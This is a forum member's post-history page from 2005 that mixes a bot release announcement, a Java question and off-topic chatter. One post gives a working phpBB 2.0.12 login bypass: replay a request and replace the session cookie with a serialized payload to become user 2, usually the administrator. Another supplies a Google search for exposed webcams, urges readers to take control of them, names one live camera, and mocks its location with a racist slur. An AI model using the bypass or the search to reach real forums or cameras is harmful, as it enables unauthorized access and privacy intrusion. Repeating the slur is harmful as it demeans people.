Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.


Topics - Networks

Pages: 1 [2]
16
General Security Information / phpBB Bug (Again...)
« on: March 25, 2005, 06:30:54 pm »
Quote
Ok, now let's get to it. Here is what you will need:
-Preferably a mozilla client, such as Firefox
-LiveHTTP Headers plugin for FireFox Here

Ok, the way this exploit works is because in phpBB's session file, it utilizes a == instead of a === on autocheckid return, allowing you to use a true boolean. I don't know if this was a typo, but to me I think it was a pretty stupid fuck up by phpBB and I am suprised it wasn't found earlier.

Howto:
Go to a forum, for example phpBB.com, open the forum index then go into tools > Live HTTP Headers > then click reload. Once the page is reloaded, go into Live HTTP Headers window, scroll all the way to the top where the first packet is. Then click replay. ScreenShot

In the packet will be thefollowing data
Code:
Host: www.phpbb.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: phpbb2support_data=a%3A0%3A%7B%7D


On this line
Cookie: phpbb2support_data=a%3A0%3A%7B%7D
Replace the a%3A0%3A%7B%7D with
Code:
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D

and then click "reload".

after the page has reloaded you should be logged in a user number 2 , which is usually the administrators id number.

I myself have tried it several times, I have not succeeded in getting an admin status so blah.

Edit: PHPBB 2.0.12 Exploit (That may be why)

17
New Project Announcements / Vanquish Bot v2.0 Beta III [Build 16]
« on: March 15, 2005, 10:06:57 am »
Indeed it has started Beta III [Build 16] for all of you awaiting this release enjoy!

What is Vanquish Bot?

Vanquish Bot is a pure moderation bot that's extensible and contains loads of moderation features and commands for your suiting. It currently uses a flag based system and connects via all clients (except pure expansion products: W3XP, D2XP) on a hashed connection as well as Warcraft III (BNLS).

Here's some information:

Readme
Screen Shots
BNCSutil.dll

PLEASE USE THE SUPPORT FORUMS LOCATED AT http://HTTP://WWW.ZEROFORCE.NET

Download Now!

Please remember it's still only a beta. =)

18
General Programming / [Java] Friend Scoping
« on: March 13, 2005, 12:57:40 pm »
What's the difference between scoping a variable or object as public and friend? You seem to have the same amount of access if the variable or object was public if you declared it to be friend and vise versa.

19
Trash Can / Come back of the year!
« on: January 27, 2005, 11:05:14 pm »
[21:03:59] darkseproth@Lordaeron: UR MOM IS SO FAT THAT PEOPLE CALL HER FATTY!!!!!!!!!!!!!

20
Trash Can / Blizzard Korean Cheetos!?
« on: January 24, 2005, 12:18:20 pm »
lol..:

http://www.blizzard.com/insider/017/overseasmerchandise.shtml



This Korean version of the cheesy snack features the images from each of the four box covers.

21
Trash Can / Insecure WebCams
« on: January 12, 2005, 05:15:27 pm »
Simply click this link:

 http://www.google.com/search?hl=en&q=inurl%3A%22ViewerFrame%3FMode%3D%22&btnG=Google+Search

and attempt to find a webcam you can control and go crazy.

This one works and it's somewhere in hong chingy chong tang:

http://golfboomer.miemasu.net:8080/ViewerFrame?Mode=Motion&Language=1

22
Trash Can / I..Have..Found..iago's problem! & the solution too!
« on: January 06, 2005, 10:58:06 pm »
http://www.newscientist.com/article.ns?id=dn6761

This should clear it all for those of you and iago. :) Enjoy!

23
Trash Can / Musick! What you like.
« on: January 06, 2005, 04:57:19 pm »

24
Trash Can / I'll be gone
« on: December 18, 2004, 08:47:48 am »
I am going on vacation to Florida for about 10 - 12 days. Just thought I'd let someone know. :)

25
Trash Can / iago is Canadian
« on: December 10, 2004, 06:34:43 pm »
and here: iago was winnipegged with a manitoba

Newby was here.

Pages: 1 [2]